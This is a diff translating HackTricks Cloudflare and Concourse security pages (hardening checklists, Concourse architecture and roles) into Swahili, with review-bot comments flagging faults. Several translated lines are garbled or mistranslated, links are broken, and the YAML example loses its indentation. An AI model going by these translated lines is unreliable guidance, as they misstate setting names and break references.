+- [ ] Katika **`Members`** inawezekana kuona wanachama wote wa akaunti na **nafasi** zao. Kumbuka kwamba ikiwa aina ya mpango si Enterprise, kuna nafasi 2 tu: Msimamizi na Msimamizi Mkuu. Lakini ikiwa **mpango unaotumika ni Enterprise**, [**nafasi zaidi**](https://developers.cloudflare.com/fundamentals/account-and-billing/account-setup/account-roles/) zinaweza kutumika kufuata kanuni ya chini ya kibali.
+- Kwa hivyo, kila wakati inapowezekana ni **pendekezo** kutumia **mpango wa Enterprise**.
+- [ ] Katika Wanachama inawezekana kukagua ni **wanachama** gani wana **2FA imewezeshwa**. **Kila** mtumiaji anapaswa kuwa nayo imewezeshwa.
> [!NOTE]
-> Note that fortunately the role **`Administrator`** doesn't give permissions to manage memberships (**cannot escalate privs or invite** new members)
+> Kumbuka kwamba kwa bahati nzuri nafasi **`Administrator`** haina ruhusa za kusimamia uanachama (**haiwezi kuongeza ruhusa au kuwaleta** wanachama wapya)
## DDoS Investigation
-[Check this part](cloudflare-domains.md#cloudflare-ddos-protection).
+[Angalia sehemu hii](cloudflare-domains.md#cloudflare-ddos-protection).
{{#include ../../banners/hacktricks-training.md}}
-
-
-
-
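Review bot: the nineteen notification names under the `Kagua **notifications.**` item and the extra-check entry (`- [ ] Kama ukaguzi wa ziada...`) drop their two-space indentation and become top-level siblings of the checklist entries instead of nested items, so the list no longer shows which alerts belong to that check; the same happens to `- Kwa hivyo, kila wakati inapowezekana...` under the Members item. Restore the indentation. Also, `mipangilio ya siri iliyofichwa` renders "sensitive hidden endpoints" as "hidden secret settings"; keep `endpoints` as the technical term (e.g. `endpoints nyeti zilizofichwa`). The role names Administrator and Super Administrator are UI labels and should stay in English like the backticked `Administrator` in the NOTE below, rather than `Msimamizi na Msimamizi Mkuu`. The `ā` in the Bulk Redirects NOTE is a mis-encoded dash on both the `-` and `+` lines; since the line is rewritten, replace it with a plain comma or dash.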
diff --git a/src/pentesting-ci-cd/cloudflare-security/cloudflare-domains.md b/src/pentesting-ci-cd/cloudflare-security/cloudflare-domains.md
index 02989e685..f69351697 100644
--- a/src/pentesting-ci-cd/cloudflare-security/cloudflare-domains.md
+++ b/src/pentesting-ci-cd/cloudflare-security/cloudflare-domains.md
@@ -2,29 +2,29 @@
{{#include ../../banners/hacktricks-training.md}}
-In each TLD configured in Cloudflare there are some **general settings and services** that can be configured. In this page we are going to **analyze the security related settings of each section:**
+Katika kila TLD iliyowekwa kwenye Cloudflare kuna **mipangilio na huduma za jumla** ambazo zinaweza kuwekwa. Katika ukurasa huu tutachambua **mipangilio inayohusiana na usalama ya kila sehemu:**
### Overview
-- [ ] Get a feeling of **how much** are the services of the account **used**
-- [ ] Find also the **zone ID** and the **account ID**
+- [ ] Pata hisia ya **ni kiasi gani** huduma za akaunti **zinatumika**
+- [ ] Pata pia **zone ID** na **account ID**
### Analytics
-- [ ] In **`Security`** check if there is any **Rate limiting**
+- [ ] Katika **`Security`** angalia kama kuna **Rate limiting**
### DNS
-- [ ] Check **interesting** (sensitive?) data in DNS **records**
-- [ ] Check for **subdomains** that could contain **sensitive info** just based on the **name** (like admin173865324.domin.com)
-- [ ] Check for web pages that **aren't** **proxied**
-- [ ] Check for **proxified web pages** that can be **accessed directly** by CNAME or IP address
-- [ ] Check that **DNSSEC** is **enabled**
-- [ ] Check that **CNAME Flattening** is **used** in **all CNAMEs**
- - This is could be useful to **hide subdomain takeover vulnerabilities** and improve load timings
-- [ ] Check that the domains [**aren't vulnerable to spoofing**](https://book.hacktricks.xyz/network-services-pentesting/pentesting-smtp#mail-spoofing)
+- [ ] Angalia **data za kuvutia** (nyeti?) katika **records** za DNS
+- [ ] Angalia **subdomains** ambazo zinaweza kuwa na **habari nyeti** kulingana na **jina** (kama admin173865324.domin.com)
+- [ ] Angalia kurasa za wavuti ambazo **hazijapangwa** **proxied**
+- [ ] Angalia kwa **kurasa za wavuti zilizopangwa** ambazo zinaweza **kupatikana moja kwa moja** kwa CNAME au anwani ya IP
+- [ ] Hakikisha kwamba **DNSSEC** ime **wezeshwa**
+- [ ] Hakikisha kwamba **CNAME Flattening** inatumika katika **CNAME zote**
+- Hii inaweza kuwa na manufaa ili **kuficha udhaifu wa kuchukua subdomain** na kuboresha nyakati za upakiaji
+- [ ] Hakikisha kwamba majina ya **hayana udhaifu wa spoofing** [**hayana udhaifu wa spoofing**](https://book.hacktricks.xyz/network-services-pentesting/pentesting-smtp#mail-spoofing)
### **Email**
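Review bot: the last DNS item duplicates the phrase: `**hayana udhaifu wa spoofing** [**hayana udhaifu wa spoofing**](...)` repeats the link text both outside and inside the link, and `majina ya` is left dangling ("the names of ..."); the source line is "Check that the domains aren't vulnerable to spoofing", so this should be one linked phrase such as `Hakikisha kwamba domains [**hazina udhaifu wa spoofing**](...)`. The "aren't proxied" item is also garbled (`ambazo **hazijapangwa** **proxied**`); "proxied" is a Cloudflare term and can stay as-is with one verb around it. Finally, the sub-bullet `- Hii inaweza kuwa na manufaa...` under the CNAME Flattening item lost its indentation and is now a top-level entry.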
@@ -38,44 +38,44 @@ TODO
#### **Overview**
-- [ ] The **SSL/TLS encryption** should be **Full** or **Full (Strict)**. Any other will send **clear-text traffic** at some point.
-- [ ] The **SSL/TLS Recommender** should be enabled
+- [ ] **SSL/TLS encryption** inapaswa kuwa **Full** au **Full (Strict)**. Mengineyo yatatuma **trafiki ya maandiko wazi** kwa wakati fulani.
+- [ ] **SSL/TLS Recommender** inapaswa kuwezeshwa
#### Edge Certificates
-- [ ] **Always Use HTTPS** should be **enabled**
-- [ ] **HTTP Strict Transport Security (HSTS)** should be **enabled**
-- [ ] **Minimum TLS Version should be 1.2**
-- [ ] **TLS 1.3 should be enabled**
-- [ ] **Automatic HTTPS Rewrites** should be **enabled**
-- [ ] **Certificate Transparency Monitoring** should be **enabled**
+- [ ] **Always Use HTTPS** inapaswa kuwa **imewezeshwa**
+- [ ] **HTTP Strict Transport Security (HSTS)** inapaswa kuwa **imewezeshwa**
+- [ ] **Minimum TLS Version inapaswa kuwa 1.2**
+- [ ] **TLS 1.3 inapaswa kuwa imewezeshwa**
+- [ ] **Automatic HTTPS Rewrites** inapaswa kuwa **imewezeshwa**
+- [ ] **Certificate Transparency Monitoring** inapaswa kuwa **imewezeshwa**
### **Security**
-- [ ] In the **`WAF`** section it's interesting to check that **Firewall** and **rate limiting rules are used** to prevent abuses.
- - The **`Bypass`** action will **disable Cloudflare security** features for a request. It shouldn't be used.
-- [ ] In the **`Page Shield`** section it's recommended to check that it's **enabled** if any page is used
-- [ ] In the **`API Shield`** section it's recommended to check that it's **enabled** if any API is exposed in Cloudflare
-- [ ] In the **`DDoS`** section it's recommended to enable the **DDoS protections**
-- [ ] In the **`Settings`** section:
- - [ ] Check that the **`Security Level`** is **medium** or greater
- - [ ] Check that the **`Challenge Passage`** is 1 hour at max
- - [ ] Check that the **`Browser Integrity Check`** is **enabled**
- - [ ] Check that the **`Privacy Pass Support`** is **enabled**
+- [ ] Katika sehemu ya **`WAF`** ni muhimu kuangalia kwamba **Firewall** na **kanuni za rate limiting zinatumika** kuzuia matumizi mabaya.
+- Kitendo cha **`Bypass`** kita **zima vipengele vya usalama vya Cloudflare** kwa ombi. Hakipaswi kutumika.
+- [ ] Katika sehemu ya **`Page Shield`** inapendekezwa kuangalia kwamba ime **wezeshwa** ikiwa kuna ukurasa wowote unatumika
+- [ ] Katika sehemu ya **`API Shield`** inapendekezwa kuangalia kwamba ime **wezeshwa** ikiwa kuna API yoyote iliyofichuliwa kwenye Cloudflare
+- [ ] Katika sehemu ya **`DDoS`** inapendekezwa kuwezesha **DDoS protections**
+- [ ] Katika sehemu ya **`Settings`**:
+- [ ] Hakikisha kwamba **`Security Level`** ni **kati** au zaidi
+- [ ] Hakikisha kwamba **`Challenge Passage`** ni saa 1 kwa max
+- [ ] Hakikisha kwamba **`Browser Integrity Check`** ime **wezeshwa**
+- [ ] Hakikisha kwamba **`Privacy Pass Support`** ime **wezeshwa**
#### **CloudFlare DDoS Protection**
-- If you can, enable **Bot Fight Mode** or **Super Bot Fight Mode**. If you protecting some API accessed programmatically (from a JS front end page for example). You might not be able to enable this without breaking that access.
-- In **WAF**: You can create **rate limits by URL path** or to **verified bots** (Rate limiting rules), or to **block access** based on IP, Cookie, referrer...). So you could block requests that doesn't come from a web page or has a cookie.
- - If the attack is from a **verified bot**, at least **add a rate limit** to bots.
- - If the attack is to a **specific path**, as prevention mechanism, add a **rate limit** in this path.
- - You can also **whitelist** IP addresses, IP ranges, countries or ASNs from the **Tools** in WAF.
- - Check if **Managed rules** could also help to prevent vulnerability exploitations.
- - In the **Tools** section you can **block or give a challenge to specific IPs** and **user agents.**
-- In DDoS you could **override some rules to make them more restrictive**.
-- **Settings**: Set **Security Level** to **High** and to **Under Attack** if you are Under Attack and that the **Browser Integrity Check is enabled**.
-- In Cloudflare Domains -> Analytics -> Security -> Check if **rate limit** is enabled
-- In Cloudflare Domains -> Security -> Events -> Check for **detected malicious Events**
+- Ikiwa unaweza, wezesha **Bot Fight Mode** au **Super Bot Fight Mode**. Ikiwa unalinda API fulani inayopatikana kwa njia ya programu (kutoka ukurasa wa mbele wa JS kwa mfano). Huenda usiweze kuwezesha hii bila kuvunja ufikiaji huo.
+- Katika **WAF**: Unaweza kuunda **mipaka ya kiwango kwa njia ya URL** au kwa **bots zilizothibitishwa** (kanuni za rate limiting), au **kuzuia ufikiaji** kulingana na IP, Cookie, referrer...). Hivyo unaweza kuzuia maombi ambayo hayajatoka kwenye ukurasa wa wavuti au yana cookie.
+- Ikiwa shambulio linatoka kwa **bot iliyothibitishwa**, angalau **ongeza kiwango cha mipaka** kwa bots.
+- Ikiwa shambulio linahusiana na **njia maalum**, kama njia ya kuzuia, ongeza **mipaka ya kiwango** katika njia hii.
+- Unaweza pia **kuongeza kwenye orodha ya nyeupe** anwani za IP, anuwai za IP, nchi au ASNs kutoka **Zana** katika WAF.
+- Angalia ikiwa **Managed rules** zinaweza pia kusaidia kuzuia matumizi mabaya ya udhaifu.
+- Katika sehemu ya **Zana** unaweza **kuzuia au kutoa changamoto kwa IP maalum** na **vifaa vya mtumiaji.**
+- Katika DDoS unaweza **kubadilisha baadhi ya kanuni ili kuzifanya kuwa za kukatisha tamaa zaidi**.
+- **Settings**: Weka **Security Level** kuwa **Juu** na kuwa **Chini ya Shambulio** ikiwa uko chini ya shambulio na kwamba **Browser Integrity Check imewezeshwa**.
+- Katika Cloudflare Domains -> Analytics -> Security -> Angalia ikiwa **rate limit** imewezeshwa
+- Katika Cloudflare Domains -> Security -> Events -> Angalia kwa **matukio mabaya yaliyogunduliwa**
### Access
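Review bot: the nested list items lost their indentation in the translated lines, so the `Bypass` remark that belonged under the WAF checkbox and the four sub-checks (`Security Level`, `Challenge Passage`, `Browser Integrity Check`, `Privacy Pass Support`) that belonged under `- [ ] Katika sehemu ya **`Settings`**:` now render as top-level siblings; restore the two-space indent the English lines had. Dashboard option values are also translated where the rest of this patch keeps product labels in English: `Weka **Security Level** kuwa **Juu** na kuwa **Chini ya Shambulio**` should keep `High` and `Under Attack` (a Swahili gloss in parentheses is fine) so the reader can find the setting. Two word choices change the meaning: `vifaa vya mtumiaji` means user devices, whereas the source means HTTP `User-Agent` strings, and `kukatisha tamaa zaidi` means more discouraging, whereas the source says more restrictive (for example `zenye vikwazo zaidi`).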
@@ -85,15 +85,15 @@ cloudflare-zero-trust-network.md
### Speed
-_I couldn't find any option related to security_
+_Sikuweza kupata chaguo lolote linalohusiana na usalama_
### Caching
-- [ ] In the **`Configuration`** section consider enabling the **CSAM Scanning Tool**
+- [ ] Katika sehemu ya **`Configuration`** fikiria kuwezesha **CSAM Scanning Tool**
### **Workers Routes**
-_You should have already checked_ [_cloudflare workers_](./#workers)
+_Unapaswa kuwa umeshakagua_ [_cloudflare workers_](./#workers)
### Rules
@@ -101,9 +101,9 @@ TODO
### Network
-- [ ] If **`HTTP/2`** is **enabled**, **`HTTP/2 to Origin`** should be **enabled**
-- [ ] **`HTTP/3 (with QUIC)`** should be **enabled**
-- [ ] If the **privacy** of your **users** is important, make sure **`Onion Routing`** is **enabled**
+- [ ] Ikiwa **`HTTP/2`** ime **wezeshwa**, **`HTTP/2 to Origin`** inapaswa kuwa **imewezeshwa**
+- [ ] **`HTTP/3 (with QUIC)`** inapaswa kuwa **imewezeshwa**
+- [ ] Ikiwa **faragha** ya **watumiaji** wako ni muhimu, hakikisha **`Onion Routing`** ime **wezeshwa**
### **Traffic**
@@ -111,7 +111,7 @@ TODO
### Custom Pages
-- [ ] It's optional to configure custom pages when an error related to security is triggered (like a block, rate limiting or I'm under attack mode)
+- [ ] Ni hiari kuweka kurasa maalum wakati kosa linalohusiana na usalama linapotokea (kama kizuizi, rate limiting au niko chini ya shambulio)
### Apps
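Review bot: `niko chini ya shambulio` renders the name of the Cloudflare setting ("I'm Under Attack Mode") as a literal sentence; keep the English label (as the patch does for `rate limiting` in the same line) so it matches the dashboard.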
@@ -119,8 +119,8 @@ TODO
### Scrape Shield
-- [ ] Check **Email Address Obfuscation** is **enabled**
-- [ ] Check **Server-side Excludes** is **enabled**
+- [ ] Angalia **Email Address Obfuscation** ime **wezeshwa**
+- [ ] Angalia **Server-side Excludes** ime **wezeshwa**
### **Zaraz**
@@ -131,7 +131,3 @@ TODO
TODO
{{#include ../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-ci-cd/cloudflare-security/cloudflare-zero-trust-network.md b/src/pentesting-ci-cd/cloudflare-security/cloudflare-zero-trust-network.md
index 491ae7bc1..bc2e39982 100644
--- a/src/pentesting-ci-cd/cloudflare-security/cloudflare-zero-trust-network.md
+++ b/src/pentesting-ci-cd/cloudflare-security/cloudflare-zero-trust-network.md
@@ -2,43 +2,43 @@
{{#include ../../banners/hacktricks-training.md}}
-In a **Cloudflare Zero Trust Network** account there are some **settings and services** that can be configured. In this page we are going to **analyze the security related settings of each section:**
+Katika akaunti ya **Cloudflare Zero Trust Network** kuna **mipangilio na huduma** ambazo zinaweza kuwekewa mipangilio. Katika ukurasa huu tutachambua **mipangilio inayohusiana na usalama ya kila sehemu:**
### Analytics
-- [ ] Useful to **get to know the environment**
+- [ ] Inasaidia **kujua mazingira**
### **Gateway**
-- [ ] In **`Policies`** it's possible to generate policies to **restrict** by **DNS**, **network** or **HTTP** request who can access applications.
- - If used, **policies** could be created to **restrict** the access to malicious sites.
- - This is **only relevant if a gateway is being used**, if not, there is no reason to create defensive policies.
+- [ ] Katika **`Policies`** inawezekana kuunda sera za **kuzuia** kwa **DNS**, **mtandao** au **HTTP** ombi nani anaweza kufikia programu.
+- Ikiwa inatumika, **sera** zinaweza kuundwa ili **kuzuia** ufikiaji wa tovuti za uhalifu.
+- Hii ni **muhimu tu ikiwa gateway inatumika**, ikiwa sivyo, hakuna sababu ya kuunda sera za kujihami.
### Access
#### Applications
-On each application:
+Katika kila programu:
-- [ ] Check **who** can access to the application in the **Policies** and check that **only** the **users** that **need access** to the application can access.
- - To allow access **`Access Groups`** are going to be used (and **additional rules** can be set also)
-- [ ] Check the **available identity providers** and make sure they **aren't too open**
-- [ ] In **`Settings`**:
- - [ ] Check **CORS isn't enabled** (if it's enabled, check it's **secure** and it isn't allowing everything)
- - [ ] Cookies should have **Strict Same-Site** attribute, **HTTP Only** and **binding cookie** should be **enabled** if the application is HTTP.
- - [ ] Consider enabling also **Browser rendering** for better **protection. More info about** [**remote browser isolation here**](https://blog.cloudflare.com/cloudflare-and-remote-browser-isolation/)**.**
+- [ ] Angalia **nani** anaweza kufikia programu katika **Policies** na hakikisha kwamba **tu** **watumiaji** ambao **wanahitaji ufikiaji** wa programu wanaweza kufikia.
+- Ili kuruhusu ufikiaji, **`Access Groups`** zitatumika (na **kanuni za ziada** zinaweza kuwekwa pia)
+- [ ] Angalia **watoa huduma za utambulisho** waliopo na hakikisha hawako **wazi sana**
+- [ ] Katika **`Settings`**:
+- [ ] Angalia **CORS haijawashwa** (ikiwa imewashwa, angalia ni **salama** na hairuhusu kila kitu)
+- [ ] Cookies zinapaswa kuwa na sifa ya **Strict Same-Site**, **HTTP Only** na **binding cookie** inapaswa kuwa **imewashwa** ikiwa programu ni HTTP.
+- [ ] Fikiria pia kuwezesha **Browser rendering** kwa ulinzi bora. Maelezo zaidi kuhusu [**remote browser isolation hapa**](https://blog.cloudflare.com/cloudflare-and-remote-browser-isolation/)**.**
#### **Access Groups**
-- [ ] Check that the access groups generated are **correctly restricted** to the users they should allow.
-- [ ] It's specially important to check that the **default access group isn't very open** (it's **not allowing too many people**) as by **default** anyone in that **group** is going to be able to **access applications**.
- - Note that it's possible to give **access** to **EVERYONE** and other **very open policies** that aren't recommended unless 100% necessary.
+- [ ] Angalia kwamba vikundi vya ufikiaji vilivyoundwa vime **kuzuia kwa usahihi** kwa watumiaji wanapaswa kuruhusu.
+- [ ] Ni muhimu hasa kuangalia kwamba **kikundi cha ufikiaji cha kawaida hakiko wazi sana** (hakiruhusu watu wengi sana) kwani kwa **kawaida** mtu yeyote katika **kikundi** hicho atakuwa na uwezo wa **kufikia programu**.
+- Kumbuka kwamba inawezekana kutoa **ufikiaji** kwa **KILA MTU** na sera nyingine **wazi sana** ambazo hazipendekezwi isipokuwa ni muhimu 100%.
#### Service Auth
-- [ ] Check that all service tokens **expires in 1 year or less**
+- [ ] Angalia kwamba tokeni zote za huduma **zinakoma katika mwaka 1 au chini**
#### Tunnels
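Review bot: the same indentation loss as in the README hunk: the `Access Groups` remark under the first Policies checkbox and the three sub-checks under `- [ ] Katika **`Settings`**:` (CORS, cookie attributes, Browser rendering), plus the `KILA MTU` note under Access Groups, are now top-level bullets instead of nested ones; restore the indent. `tovuti za uhalifu` (criminal sites) also narrows the source's "malicious sites"; `tovuti hatari` or `tovuti ovu` is closer.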
@@ -50,16 +50,12 @@ TODO
### Logs
-- [ ] You could search for **unexpected actions** from users
+- [ ] Unaweza kutafuta **vitendo visivyotarajiwa** kutoka kwa watumiaji
### Settings
-- [ ] Check the **plan type**
-- [ ] It's possible to see the **credits card owner name**, **last 4 digits**, **expiration** date and **address**
-- [ ] It's recommended to **add a User Seat Expiration** to remove users that doesn't really use this service
+- [ ] Angalia **aina ya mpango**
+- [ ] Inawezekana kuona **jina la mmiliki wa kadi ya mkopo**, **nambari 4 za mwisho**, tarehe ya **kuisha** na **anwani**
+- [ ] Inapendekezwa **kuongeza Uthibitisho wa Kiti cha Mtumiaji** ili kuondoa watumiaji ambao hawatumii huduma hii kwa kweli
{{#include ../../banners/hacktricks-training.md}}
-
-
-
-
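Review bot: `Uthibitisho wa Kiti cha Mtumiaji` means "User Seat Verification", but the source refers to the specific Zero Trust setting "User Seat Expiration"; either keep the English label or translate it as an expiry (for example `Muda wa Kuisha wa Kiti cha Mtumiaji`) so the recommendation still points at the right option.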
diff --git a/src/pentesting-ci-cd/concourse-security/README.md b/src/pentesting-ci-cd/concourse-security/README.md
index bcf20facf..1a951d396 100644
--- a/src/pentesting-ci-cd/concourse-security/README.md
+++ b/src/pentesting-ci-cd/concourse-security/README.md
@@ -1,37 +1,33 @@
-# Concourse Security
+# Usalama wa Concourse
{{#include ../../banners/hacktricks-training.md}}
-## Basic Information
+## Taarifa za Msingi
-Concourse allows you to **build pipelines** to automatically run tests, actions and build images whenever you need it (time based, when something happens...)
+Concourse inakuwezesha **kujenga mipango** ili kiotomatiki kufanikisha majaribio, vitendo na kujenga picha kila wakati unavyohitaji (kulingana na muda, wakati kitu kinapotokea...)
-## Concourse Architecture
+## Muktadha wa Concourse
-Learn how the concourse environment is structured in:
+Jifunze jinsi mazingira ya concourse yalivyojengwa katika:
{{#ref}}
-concourse-architecture.md
+muktadha-wa-concourse.md
{{#endref}}
-## Concourse Lab
+## Maabara ya Concourse
-Learn how you can run a concourse environment locally to do your own tests in:
+Jifunze jinsi unavyoweza kuendesha mazingira ya concourse kwa ndani ili kufanya majaribio yako mwenyewe katika:
{{#ref}}
-concourse-lab-creation.md
+uundaji-wa-maabara-ya-concourse.md
{{#endref}}
-## Enumerate & Attack Concourse
+## Kuorodhesha & Kushambulia Concourse
-Learn how you can enumerate the concourse environment and abuse it in:
+Jifunze jinsi unavyoweza kuorodhesha mazingira ya concourse na kuyatumia vibaya katika:
{{#ref}}
-concourse-enumeration-and-attacks.md
+kuorodhesha-na-kushambulia-concourse.md
{{#endref}}
{{#include ../../banners/hacktricks-training.md}}
-
-
-
-
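Review bot: the three `{{#ref}}` targets were renamed to `muktadha-wa-concourse.md`, `uundaji-wa-maabara-ya-concourse.md` and `kuorodhesha-na-kushambulia-concourse.md`, but this patch does not rename the files: the `diff --git` headers further down still edit `concourse-architecture.md` and `concourse-enumeration-and-attacks.md`, and `SUMMARY.md` is edited separately. As submitted, all three links will be broken in the built book; keep the original filenames in the `{{#ref}}` blocks and translate only the surrounding prose. Separately, `Muktadha` means context; the heading is about architecture (`Muundo` or `Usanifu`).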
diff --git a/src/pentesting-ci-cd/concourse-security/concourse-architecture.md b/src/pentesting-ci-cd/concourse-security/concourse-architecture.md
index d70167906..4214c1d7a 100644
--- a/src/pentesting-ci-cd/concourse-security/concourse-architecture.md
+++ b/src/pentesting-ci-cd/concourse-security/concourse-architecture.md
@@ -12,31 +12,27 @@
#### ATC: web UI & build scheduler
-The ATC is the heart of Concourse. It runs the **web UI and API** and is responsible for all pipeline **scheduling**. It **connects to PostgreSQL**, which it uses to store pipeline data (including build logs).
+ATC ni moyo wa Concourse. Inafanya kazi ya **web UI na API** na ina jukumu la **kusimamia** mipango yote ya pipeline. In **unganishwa na PostgreSQL**, ambayo inatumika kuhifadhi data za pipeline (ikiwemo kumbukumbu za ujenzi).
-The [checker](https://concourse-ci.org/checker.html)'s responsibility is to continuously checks for new versions of resources. The [scheduler](https://concourse-ci.org/scheduler.html) is responsible for scheduling builds for a job and the [build tracker](https://concourse-ci.org/build-tracker.html) is responsible for running any scheduled builds. The [garbage collector](https://concourse-ci.org/garbage-collector.html) is the cleanup mechanism for removing any unused or outdated objects, such as containers and volumes.
+Jukumu la [checker](https://concourse-ci.org/checker.html) ni kuangalia kwa muda wote toleo jipya la rasilimali. [scheduler](https://concourse-ci.org/scheduler.html) ina jukumu la kupanga ujenzi kwa kazi na [build tracker](https://concourse-ci.org/build-tracker.html) ina jukumu la kuendesha ujenzi wowote uliopangwa. [garbage collector](https://concourse-ci.org/garbage-collector.html) ni mekanizma ya kusafisha kwa kuondoa vitu vyovyote visivyotumika au vya zamani, kama vile kontena na volumes.
#### TSA: worker registration & forwarding
-The TSA is a **custom-built SSH server** that is used solely for securely **registering** [**workers**](https://concourse-ci.org/internals.html#architecture-worker) with the [ATC](https://concourse-ci.org/internals.html#component-atc).
+TSA ni **seva ya SSH iliyojengwa maalum** ambayo inatumika pekee kwa **kujiandikisha** [**workers**](https://concourse-ci.org/internals.html#architecture-worker) kwa [ATC](https://concourse-ci.org/internals.html#component-atc).
-The TSA by **default listens on port `2222`**, and is usually colocated with the [ATC](https://concourse-ci.org/internals.html#component-atc) and sitting behind a load balancer.
+TSA kwa **kawaida inasikiliza kwenye bandari `2222`**, na mara nyingi iko pamoja na [ATC](https://concourse-ci.org/internals.html#component-atc) na iko nyuma ya balancer ya mzigo.
-The **TSA implements CLI over the SSH connection,** supporting [**these commands**](https://concourse-ci.org/internals.html#component-tsa).
+**TSA inatekeleza CLI kupitia muunganisho wa SSH,** ikisaidia [**amri hizi**](https://concourse-ci.org/internals.html#component-tsa).
#### Workers
-In order to execute tasks concourse must have some workers. These workers **register themselves** via the [TSA](https://concourse-ci.org/internals.html#component-tsa) and run the services [**Garden**](https://github.com/cloudfoundry-incubator/garden) and [**Baggageclaim**](https://github.com/concourse/baggageclaim).
+Ili kutekeleza kazi, concourse lazima iwe na baadhi ya wafanyakazi. Wafanyakazi hawa **jiandikishe** kupitia [TSA](https://concourse-ci.org/internals.html#component-tsa) na kuendesha huduma [**Garden**](https://github.com/cloudfoundry-incubator/garden) na [**Baggageclaim**](https://github.com/concourse/baggageclaim).
-- **Garden**: This is the **Container Manage AP**I, usually run in **port 7777** via **HTTP**.
-- **Baggageclaim**: This is the **Volume Management API**, usually run in **port 7788** via **HTTP**.
+- **Garden**: Hii ni **Container Manage API**, mara nyingi inafanya kazi kwenye **bandari 7777** kupitia **HTTP**.
+- **Baggageclaim**: Hii ni **Volume Management API**, mara nyingi inafanya kazi kwenye **bandari 7788** kupitia **HTTP**.
## References
- [https://concourse-ci.org/internals.html](https://concourse-ci.org/internals.html)
{{#include ../../banners/hacktricks-training.md}}
-
-
-
-
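Review bot: `In **unganishwa na PostgreSQL**` is a broken word (`Inaunganishwa`), and `Wafanyakazi hawa **jiandikishe**` uses the subjunctive where the source makes a plain statement (`hujiandikisha`). Port numbers, component names and the `Container Manage AP**I` bold fix all look correct.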
diff --git a/src/pentesting-ci-cd/concourse-security/concourse-enumeration-and-attacks.md b/src/pentesting-ci-cd/concourse-security/concourse-enumeration-and-attacks.md
index 4b778a804..157d66194 100644
--- a/src/pentesting-ci-cd/concourse-security/concourse-enumeration-and-attacks.md
+++ b/src/pentesting-ci-cd/concourse-security/concourse-enumeration-and-attacks.md
@@ -6,36 +6,34 @@
### User Roles & Permissions
-Concourse comes with five roles:
+Concourse inakuja na majukumu matano:
-- _Concourse_ **Admin**: This role is only given to owners of the **main team** (default initial concourse team). Admins can **configure other teams** (e.g.: `fly set-team`, `fly destroy-team`...). The permissions of this role cannot be affected by RBAC.
-- **owner**: Team owners can **modify everything within the team**.
-- **member**: Team members can **read and write** within the **teams assets** but cannot modify the team settings.
-- **pipeline-operator**: Pipeline operators can perform **pipeline operations** such as triggering builds and pinning resources, however they cannot update pipeline configurations.
-- **viewer**: Team viewers have **"read-only" access to a team** and its pipelines.
+- _Concourse_ **Admin**: Hii jukumu inatolewa tu kwa wamiliki wa **timu kuu** (timu ya mwanzo ya concourse). Wasimamizi wanaweza **kuunda timu nyingine** (mfano: `fly set-team`, `fly destroy-team`...). Ruhusa za jukumu hili haziwezi kuathiriwa na RBAC.
+- **mwenye**: Wamiliki wa timu wanaweza **kubadilisha kila kitu ndani ya timu**.
+- **mwanachama**: Wanachama wa timu wanaweza **kusoma na kuandika** ndani ya **rasilimali za timu** lakini hawawezi kubadilisha mipangilio ya timu.
+- **mpangaji-mchakato**: Wapangaji-mchakato wanaweza kufanya **operesheni za mchakato** kama vile kuanzisha ujenzi na kuweka rasilimali, hata hivyo hawawezi kubadilisha mipangilio ya mchakato.
+- **mtazamaji**: Watazamaji wa timu wana **"ufikiaji wa kusoma tu" kwa timu** na mchakato zake.
> [!NOTE]
-> Moreover, the **permissions of the roles owner, member, pipeline-operator and viewer can be modified** configuring RBAC (configuring more specifically it's actions). Read more about it in: [https://concourse-ci.org/user-roles.html](https://concourse-ci.org/user-roles.html)
+> Zaidi ya hayo, **ruhusa za majukumu ya mwenye, mwanachama, mpangaji-mchakato na mtazamaji zinaweza kubadilishwa** kwa kuunda RBAC (kuunda kwa usahihi vitendo vyake). Soma zaidi kuhusu hilo katika: [https://concourse-ci.org/user-roles.html](https://concourse-ci.org/user-roles.html)
-Note that Concourse **groups pipelines inside Teams**. Therefore users belonging to a Team will be able to manage those pipelines and **several Teams** might exist. A user can belong to several Teams and have different permissions inside each of them.
+Kumbuka kwamba Concourse **inaunganisha mchakato ndani ya Timu**. Hivyo basi watumiaji wanaotokana na Timu wataweza kusimamia mchakato hizo na **Timu kadhaa** zinaweza kuwepo. Mtumiaji anaweza kuwa sehemu ya Timu kadhaa na kuwa na ruhusa tofauti ndani ya kila moja yao.
### Vars & Credential Manager
-In the YAML configs you can configure values using the syntax `((_source-name_:_secret-path_._secret-field_))`.\
-[From the docs:](https://concourse-ci.org/vars.html#var-syntax) The **source-name is optional**, and if omitted, the [cluster-wide credential manager](https://concourse-ci.org/vars.html#cluster-wide-credential-manager) will be used, or the value may be provided [statically](https://concourse-ci.org/vars.html#static-vars).\
-The **optional \_secret-field**\_ specifies a field on the fetched secret to read. If omitted, the credential manager may choose to read a 'default field' from the fetched credential if the field exists.\
-Moreover, the _**secret-path**_ and _**secret-field**_ may be surrounded by double quotes `"..."` if they **contain special characters** like `.` and `:`. For instance, `((source:"my.secret"."field:1"))` will set the _secret-path_ to `my.secret` and the _secret-field_ to `field:1`.
+Katika mipangilio ya YAML unaweza kuunda thamani ukitumia sintaksia `((_source-name_:_secret-path_._secret-field_))`.\
+[Kutoka kwenye hati:](https://concourse-ci.org/vars.html#var-syntax) **source-name ni hiari**, na ikiwa imeachwa, [meneja wa akiba wa kiwango cha klasta](https://concourse-ci.org/vars.html#cluster-wide-credential-manager) atatumika, au thamani inaweza kutolewa [kwa statiki](https://concourse-ci.org/vars.html#static-vars).\
+**_secret-field_** ya hiari inabainisha uwanja kwenye akiba iliyopatikana kusoma. Ikiwa imeachwa, meneja wa akiba anaweza kuchagua kusoma 'uwanja wa kawaida' kutoka kwa akiba iliyopatikana ikiwa uwanja huo upo.\
+Zaidi ya hayo, _**secret-path**_ na _**secret-field**_ zinaweza kuzungukwa na nukuu mbili `"..."` ikiwa zina **micharacters maalum** kama `.` na `:`. Kwa mfano, `((source:"my.secret"."field:1"))` itaweka _secret-path_ kuwa `my.secret` na _secret-field_ kuwa `field:1`.
#### Static Vars
-Static vars can be specified in **tasks steps**:
-
+Static vars zinaweza kubainishwa katika **hatua za kazi**:
```yaml
- task: unit-1.13
- file: booklit/ci/unit.yml
- vars: { tag: 1.13 }
+file: booklit/ci/unit.yml
+vars: { tag: 1.13 }
```
-
Or using the following `fly` **arguments**:
- `-v` or `--var` `NAME=VALUE` sets the string `VALUE` as the value for the var `NAME`.
